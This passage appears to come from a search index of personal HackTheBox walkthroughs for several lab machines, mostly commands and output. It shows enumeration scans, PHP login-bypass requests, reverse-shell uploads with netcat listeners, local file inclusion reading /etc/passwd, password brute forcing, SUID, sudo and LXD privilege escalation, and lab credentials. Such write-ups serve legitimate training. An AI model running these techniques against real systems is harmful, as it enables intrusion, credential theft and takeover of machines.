                        Browsing that exposed URL we can filter columns by size. That would be a quick way to spot the file that contains the credentials (it has a different size from the others). Again, this is HackTheBox and not the reality. In the real world you would probably download as silently as possible all the files, for further processing.

                        But this is HackTheBox and we have credentials to proceed to the next step. Login into the dashboard http://bank.htb/login.php:

                        --ERR ENCRYPT FAILED\n+=================+\n| HTB Bank Report |\n+=================+\n\n===UserAccount===\nFull Name: Christos Christopoulos\nEmail: chris@bank.htb\nPassword: !##HTBB4nkP4ssw0rd!##\nCreditCards: 5\nTransactions: 39\nBalance: 8842803 .\n===UserAccount===\n

                        Browsing around a little, and reading source code, you can easily find a valuable debug comment:

                        With this, I just modified my pentesmonkey file to extension .htb and had it uploaded. Under column \"Attachment\" in the dashboard, you have the link to the uploaded file.

                        Start a netcat listener:

                        nc -lnvp 1234\n

                        In my case, I clicked on http://bank.htb/uploads/pentesmonkey.htb and got a reverse shell.

                        Cat the user.txt

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#flag-roottxt","title":"Flag root.txt","text":"

                        After some basic reconnaissance, I run:

                        find / -perm /4000 2>/dev/null\n

                        And results:

                        /var/htb/bin/emergency\n/usr/lib/eject/dmcrypt-get-device\n/usr/lib/openssh/ssh-keysign\n/usr/lib/dbus-1.0/dbus-daemon-launch-helper\n/usr/lib/policykit-1/polkit-agent-helper-1\n...\n

                        /var/htb/bin/emergency catches our attention inmediately. Doing a strings on it we can see that it contains a \"/bin/bash\" command. After resolving this machine, I read this writeup and got some insights about how to investigate an elf file beyond doing some strings. In this writeup, a md5sum is done and googling the hash returned that this elf file is in reality a dash shell.

                        Nice. Run the binary and you are root.

                        ./var/htb/bin/emergency\n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-base/","title":"Base - A Hack The Box machine","text":"

                        Enumerate open ports and services.

                        nmap -sC -sV $ip -Pn\n

                        Ports 22 and 80 are open.

                        Add base.htb to /etc/hosts.

                        Enumerate directories:

                        gobuster dir -u http://base.htb/login -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt\n

                        Some file and folders uncovered:

                        - http://base.htb/_uploaded/\n- http://base.htb/login/\n- http://base.htb/login/login.php\n- http://base.htb/forms/\n- http://base.htb/assets/\n- http://base.htb/logout.php\n

                        Under /login there are three files: login.php, config.php and login.php.swp. There are two ways of reading the swap file, with strings and with vim:

                        vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

                        Content:

                        <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

                        Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator \u201c===\u201d instead of the loose comparison operator \u201c==\u201d. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                        My notes about php type jugling.

                        In the HackTheBox machine Base, login form was bypasseable by entering an empty array into the username and password parameters:

                        Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                        Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

                        How to know? By spotting the file login.php.swp in the /login exposed directory and reading its contents.

                        After sending request with BurpSuite, grab the PHPsession cookie and in your browser enter that cookie and go to: http://base.htb/upload.php. Now you can upload our pentesmonkey shell using BurpSuite Repeater (important note: change header to \"Content-Type: image/png\", file extension may remain php). Have your netcat listener ready.

                        whoami\n
                        www-data\n

                        Credentials can be found at /var/www/html/login/config.php. Use them to login as the existing user at /home

                        su john\n# enter password: thisisagoodpassword\n

                        Once you are john, you have access to user.txt. Also, to be root:

                        id\nsudo -l\n
                        ohn@base:~$ sudo -l\nsudo -l\n[sudo] password for john: thisisagoodpassword\n\nMatching Defaults entries for john on base:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser john may run the following commands on base:\n    (root : root) /usr/bin/find\n

                        See cheat sheet about suid binaries and:

                        sudo find . -exec /bin/sh \\; -quit\n

                        Now you are root and can echo /root/root.txt

                        ","tags":["walkthrough","php type juggling","reverse shell","suid binary","linux privilege escalation"]},{"location":"htb-crocodile/","title":"Crocodile - A HackTheBox machine","text":"
                        nmap -sC -A $ip -Pn\n

                        Results:

                        PORT   STATE SERVICE VERSION\n21/tcp open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist\n|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd\n80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache/2.4.41 (Ubuntu)\n|_http-title: Smash - Bootstrap Business Template\nService Info: OS: Unix\n

                        Now we enumerate directories:

                        gobuster dir -e -u http://10.129.1.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -r \n

                        Results:

                        ===============================================================\nGobuster v3.5\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://10.129.1.15/\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.5\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2023/05/01 16:21:20 Starting gobuster in directory enumeration mode\n===============================================================\nhttp://10.129.1.15/assets               (Status: 200) [Size: 1703]\nhttp://10.129.1.15/css                  (Status: 200) [Size: 1350]\nhttp://10.129.1.15/js                   (Status: 200) [Size: 1138]\nhttp://10.129.1.15/fonts                (Status: 200) [Size: 1968]\nhttp://10.129.1.15/dashboard            (Status: 200) [Size: 1577]\nhttp://10.129.1.15/server-status        (Status: 403) [Size: 276]\nProgress: 220534 / 220561 (99.99%)\n===============================================================\n2023/05/01 16:29:51 Finished\n===============================================================\n

                        At the same time, we explore ftp service. Anonymous login is allowed.

                        ftp 10.129.1.15 \ndir\nmget *\n

                        Two files are downloaded.

                        cat allowed.userlist\n

                        Results:

                        aron\npwnmeow\negotisticalsw\nadmin\n

                        And passwords:

                        cat allowed.userlist.passwd \n

                        Results:

                        root\nSupersecretpassword1\n@BaASD&9032123sADS\nrKXM59ESxesUFHAd\n

                        Now we can enter in http://10.129.1.15/dashboard with credentials for admin. Flag is in the main panel.

                        ","tags":["walkthrough"]},{"location":"htb-explosion/","title":"Explosion - A HackTheBox machine","text":"
                        nmap -sC -sV $ip -Pn\n
                        PORT     STATE SERVICE       VERSION\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp  open  microsoft-ds?\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-ntlm-info: \n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2023-04-27T10:42:37+00:00\n|_ssl-date: 2023-04-27T10:42:45+00:00; 0s from scanner time.\n| ssl-cert: Subject: commonName=Explosion\n| Issuer: commonName=Explosion\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-04-26T10:27:02\n| Not valid after:  2023-10-26T10:27:02\n| MD5:   2446e544fced2077f37238e35735b16e\n| SHA-1: cace39c8a8b0ae2a4bf509705cc78f084b9aec0b\n| -----BEGIN CERTIFICATE-----\n| MIIC1jCCAb6gAwIBAgIQadtbfAUkgr5BZjE2eNbcBzANBgkqhkiG9w0BAQsFADAU\n| MRIwEAYDVQQDEwlFeHBsb3Npb24wHhcNMjMwNDI2MTAyNzAyWhcNMjMxMDI2MTAy\n| NzAyWjAUMRIwEAYDVQQDEwlFeHBsb3Npb24wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQDSS2eXLWZRkoPS26o641YgH94ZMh9lCyaz2qMPhHsbjNGwZSTC\n| WY+Pm8nAROk5HTTq0CYHWyKZN7I2dONAG42I6pRWdpV3k5NwTj3wCR7BB1WqL5mB\n| CTN7LxfEzngrdU1tPI6FdSkI12I+2h+ckz+2lUaY58+3ENNGe06U82jE8RrEmnFd\n| 0Is0UvA3D3ec2Mzr1Ji8LRko3/rMhggn9T5n75Kh0PstZoRdN+XVjcKfazIfhkZb\n| Wz0/BXcB5fwfSGOWaKcHIL26IviI8DbgS46d4Ydw0tGWE+8BHt3jizillCueg03v\n| TYj4W6d9nqDB1/QmUz9w1tqviUZM7qPCK6qxAgMBAAGjJDAiMBMGA1UdJQQMMAoG\n| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEANyNIxLXD\n| ftgW+zs+5JGz2WbeLauLLWE3+LJNfMxGWZr9BJAaF4VX0V/dXP3MXLywhqsz+V56\n| mam2jNi44nu4ov+1FgqPKsRdUEb8uOocWEAUE28L48Eh0M09JjVg639REwzqohPV\n| KyqdnHhPkCNH3Js8nJCZkAl6EgWJMWLenD0htNTkJHjtHSR0D3Dyc08WsMPmyOtX\n| m+4Oi8RS7qrHYG0nCvQmJpvNO9eiqYfVVzP5Q06K45hZ/xlVTVePhJFxdVGcc7CH\n| qEILmRdzuvKaRpAD6QocoUm8I3wogOTTV4DcsNOnNSLoFj/TI8i5FV791lZDEzcL\n| bWFK5GD+11kCOw==\n|_-----END CERTIFICATE-----\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 0s, deviation: 0s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-04-27T10:42:40\n|_  start_date: N/A\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 37798/tcp): CLEAN (Couldn't connect)\n|   Check 2 (port 6858/tcp): CLEAN (Couldn't connect)\n|   Check 3 (port 35582/udp): CLEAN (Timeout)\n|   Check 4 (port 50597/udp): CLEAN (Failed to receive data)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n

                        After going through all open ports, running this nmap script on 3389 gives us interesting results:

                        nmap -Pn -sV -p3389 --script rdp-* $ip\n

                        Resolution of machine in port 3389 tricks.

                        ","tags":["walkthrough"]},{"location":"htb-friendzone/","title":"Walkthrough - Friendzone, a Hack The Box machine","text":"
                        nmap -sC -sV $IP -Pn\n
                        \u2514\u2500$ nmap -sC -sV $IP -Pn          \nStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 18:23 EDT\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 14.29% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:15 remaining)\nNmap scan report for 10.129.228.87\nHost is up (0.045s latency).\nNot shown: 993 closed tcp ports (conn-refused)\nPORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 3.0.3\n22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)\n|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)\n|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)\n53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu\n80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Friend Zone Escape software\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443/tcp open  ssl/http    Apache httpd 2.4.29\n|_http-title: 404 Not Found\n| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO\n| Not valid before: 2018-10-05T21:02:30\n|_Not valid after:  2018-11-04T21:02:30\n|_ssl-date: TLS randomness does not represent time\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| tls-alpn: \n|_  http/1.1\n445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\nService Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n| smb2-time: \n|   date: 2023-04-18T22:23:28\n|_  start_date: N/A\n|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: friendzone\n|   NetBIOS computer name: FRIENDZONE\\x00\n|   Domain name: \\x00\n|   FQDN: friendzone\n|_  System time: 2023-04-19T01:23:29+03:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 35.34 seconds\n

                        Interesting here: port 53 open. On port 443 you can read:

                        | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO

                        We have here domain name friendzone.red. Also visiting the ip in the browser there is an info email with domain friendzoneportal.red.

                        Enumerating shares in samba:

                        smbclient -L 10.129.228.87\nsmbmap -H 10.129.228.87\n
                        An alternative is using enum4linux.md.

                        Checking out each shared folder:

                        smbclient \\\\\\\\10.129.228.87\\\\Files\nsmbclient \\\\\\\\10.129.228.87\\\\print$\nsmbclient \\\\\\\\10.129.228.87\\\\general\nsmbclient \\\\\\\\10.129.228.87\\\\Developement\nsmbclient \\\\\\\\10.129.228.87\\\\IPC$\n

                        From shared folder general and samba terminal we can download the file creds.txt

                        dir\nmget *\n
                        ","tags":["walkthrough"]},{"location":"htb-friendzone/#transferring-dns-zone","title":"Transferring DNS zone","text":"

                        Some HackTheBox machines exploits DNS zone transfer:

                        In the example of Friendzone machine, accessible web page on port 80 provides an email in which a different domain is appreciated. Also port 53 is open, which is an indicator of some possible DNS zone transfer.

                        In friendzone, we will transfer our zone to all zones spotted in different scanners:

                        # friendzone.red was spotted in the nmap scan. Transferring 10.129.228.87 zone to friendzone.red\ndig axfr friendzone.red @10.129.228.87\n\n# Also friendzoneportal.red was spotted in the email that appeared on http://10.129.228.87. Transferring 10.129.228.87 zone to friendzoneportal.red:\ndig axfr friendzoneportal.red @10.129.228.87\n

                        Add those subdomains to your /etc/hosts

                        Visit https://administrator1.friendzone.red and a login panel is displayed. Use credentials found in samba shared folder. After login into the application a message is displayed: \"Login Done ! visit /dashboard.php\".

                        ","tags":["walkthrough"]},{"location":"htb-funnel/","title":"Walkthrough - A HackTheBox machine - Funnel","text":"

                        Enumerate port/services:

                        nmap -sV -sC $ip -Pn -p-\n

                        Open ports: 21 and 22.

                        We can log into ftp with anonymous user:

                        ftp $ip\n# enter user when prompted: anonymous\n# Press enter when prompted for password.\n

                        In the ftp service there is a directory, mail_backup.

                        cd mail_backup\nmget *\n

                        Get users from file welcome_28112022

                        • optimus@funnel.htb
                        • albert@funnel.htb
                        • andreas@funnel.htb
                        • christine@funnel.htb
                        • maria@funnel.htb

                        Get default password from file password_policy.pdf: \"funnel123#!#\".

                        You can use hydra or try out manually to access. Finally user with default password is christine:

                        sshpass -p 'funnel123#!#' ssh christine@10.129.228.102\n

                        Now we can enumerate socket connections with the command \"ss\"

                        ss -tl\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n

                        Results:

                        State  Recv-Q Send-Q Local Address:Port       Peer Address:PortProcess \nLISTEN 0      4096   127.0.0.53%lo:domain          0.0.0.0:*           \nLISTEN 0      128          0.0.0.0:ssh             0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:postgresql      0.0.0.0:*           \nLISTEN 0      4096       127.0.0.1:33599           0.0.0.0:*           \nLISTEN 0      32                 *:ftp                   *:*           \nLISTEN 0      128             [::]:ssh                [::]:* \n

                        postgresql is in use. Since our user is not in the sudoers file and can not install a postgres client, we can bypass this situation via port forwarding.

                        If the tool is not installed, then run in the atacker machine:

                        sudo apt install postgresql-client-common\n

                        1. In the attacking machine:

                        ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n

                        2. In another terminal in the attacking machine:

                        sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n

                        Once logged in, use postgresql cheat sheet to get the flag.

                        ","tags":["walkthrough","postgresql","ftp"]},{"location":"htb-ignition/","title":"Ignition, a Hack The Box Machine","text":"
                        nmap -sC -sV $ip -Pn\n

                        Adding ignition.htb to /etc/hosts

                        Enumerating:

                        dir -u http://ignition.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -t 40\n

                        Browsing found files and gathering information:

                        /home                 (Status: 200) [Size: 25802]\n/contact              (Status: 200) [Size: 28673]\n/media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]\n/0                    (Status: 200) [Size: 25803]\n/static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]\n/catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]\n/admin                (Status: 200) [Size: 7095]\n/Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]\n/setup                (Status: 301) [Size: 185] [--> http://ignition.htb/setup/]\n/checkout             (Status: 302) [Size: 0] [--> http://ignition.htb/checkout/cart/]\n/robots               (Status: 200) [Size: 1]\n/wishlist             (Status: 302) [Size: 0] [--> http://ignition.htb/customer/account/login/referer/aHR0cDovL2lnbml0aW9uLmh0Yi93aXNobGlzdA%2C%2C/]    \n/soap                 (Status: 200) [Size: 391]\n

                        Knowing this we could do a more precise enumeration with:

                        gobuster dir -u http://ignition.htb -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/CMS/sitemap-magento.txt  \n

                        From /admin we get to a login panel of a Magento application. From /setup we obtain the Magento version: Version dev-2.4-develop.

                        Brute forcing it:

                        wfuzz -c -z file,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt -d \"login%5Busername%5D=admin&login%5Bpassword%5D=FUZZ\" http://ignition.htb/admin\n

                        Enter in /admin with credentials. Flag is in the dashboard.

                        ","tags":["walkthrough"]},{"location":"htb-included/","title":"Included - A HackTheBox machine","text":"

                        After running a port scan, the only open port is 80.

                        nmap -sC -sV $ip -Pn -p-\n

                        Results:

                        80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| http-title: Site doesn't have a title (text/html; charset=UTF-8).\n|_Requested resource was http://10.129.95.185/?file=home.php\n

                        After visiting the site with the browser and examining its code, it's a simple web site. php is used. The endpoint that appears in the scanner has a LFI vulnerability and some files can be read.

                        Burpsuite request:

                        GET /?file=../../../../../../etc/passwd HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

                        Result:

                        HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:04:13 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 1575\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nmike:x:1000:1000:mike:/home/mike:/bin/bash\ntftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin\n

                        Something interesting is that after user mike, there is a service/user: tftp. Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides. It is also revealed that TFTP uses the User Datagram Protocol (UDP) to communicate. This is defined as a lightweight data transport protocol that works on top of IP.

                        UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out of order packets. It is implemented in the transport layer of the OSI Model, known as a fast but not reliable protocol, unlike TCP, which is reliable, but slower then UDP. Just like how TCP contains open ports for protocols such as HTTP, FTP, SSH and etcetera, the same way UDP has ports for protocols that work for UDP.

                        sudo nmap -sU 10.129.95.185   \n

                        You can use metasploit or python to check if can upload/download files. Module auxiliary/admin/tftp/tftp_transfer_util

                        And also you can exploit it manually. Install tftp client:

                        # Install tftp client\nsudo apet install tftp\n

                        Also, check for manual and available commands:

                        man tftp\n

                        Upload your pentesmonkey shell with:

                        put pentesmonkey.php\n

                        Where does it get uploaded? Depends. But The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The directory is configured there under the parameter TFTP_DIRECTORY=. With that information, you can access the directory and from there launch your reverse shell.

                        Let's do it. Request in Burpsuite:

                        GET /?file=../../../../../../etc/default/tftpd-hpa HTTP/1.1\nHost: 10.129.95.185\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n

                        Response:

                        HTTP/1.1 200 OK\nDate: Mon, 08 May 2023 07:27:32 GMT\nServer: Apache/2.4.29 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 125\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\n# /etc/default/tftpd-hpa\n\nTFTP_USERNAME=\"tftp\"\nTFTP_DIRECTORY=\"/var/lib/tftpboot\"\nTFTP_ADDRESS=\":69\"\nTFTP_OPTIONS=\"-s -l -c\"\n

                        Now, open netcat on one terminal

                        nc -lnvp 1234\n

                        Launch your shell by visiting in the browser:

                        http://10.129.95.185/?file=../../../../../..//var/lib/tftpboot/pentesmonkey.php\n

                        Spawn a shell.

                        SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

                        Browse around. Credentials for user mike are at /var/wwww/html/.htpasswd:

                        su mike\n# Enter password: Sheffield19\n

                        And get the user.txt flag:

                        cd\nls -la\ncat user.txt\n
                        ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-included/#privilege-escalation","title":"Privilege escalation","text":"
                        whoami\npwd\nid\ngroups\nuname -a\nlsb_release -a\n

                        Information retrieved:

                        uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)\ngroups\nmike lxd\nuname -a\nLinux included 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription:    Ubuntu 18.04.5 LTS\nRelease:        18.04\nCodename:       bionic\n

                        After looking for \"exploit ubuntu 18.04.5 LTS\" there exists a exploit that uses lxd service, which makes sense after reading the information retrieved. About lxd privilege escalation.

                        LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.

                        Basically, as mike we belong to group lxd. Let's exploit this:

                        Steps to be performed on the attacker machine:

                        # Download build-alpine in your local machine through the git repository:\ngit clone https://github.com/saghul/lxd-alpine-builder.git\n\n# Execute the script \u201cbuild -alpine\u201d that will build the latest Alpine image as a compressed file, this step must be executed by the root user.\ncd lxd-alpine-builder\nsudo ./build-alpine\n\n# This will generate a tar file that you need to transfer to the victim machine. For that you can copy that file to your /var/www/html folder and start apache2 service.\n

                        Steps to be performed on the victim machine:

                        # Download the alpine image. Go for instance to the /tmp folder and, if you have started the apache2 service in the attacker machine, do a wget:\nwget http://AtackerIP//alpine-v3.17-x86_64-20230508_0532.tar.gz\n\n# After the image is built it can be added as an image to LXD as follows:\nlxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage\n\n# List available images:\nlxc image list\n\n# Initiate your image inside a new container\nlxc init myimage ignite -c security.privileged=true\n\n# Mount the container inside the /root directory\nlxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true\n\n# Initialize the container\nlxc start ignite\n\n# Launch a shell command in the container\nlxc exec ignite /bin/sh\n

                        Now, we should be root:

                        whoami\ncd /\nfind . -name root.txt 2>/dev/null\n
                        ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-lame/","title":"HTB Lame","text":"
                        # Reconnaissance\nnmap -sC -sV $IP -Pn\n
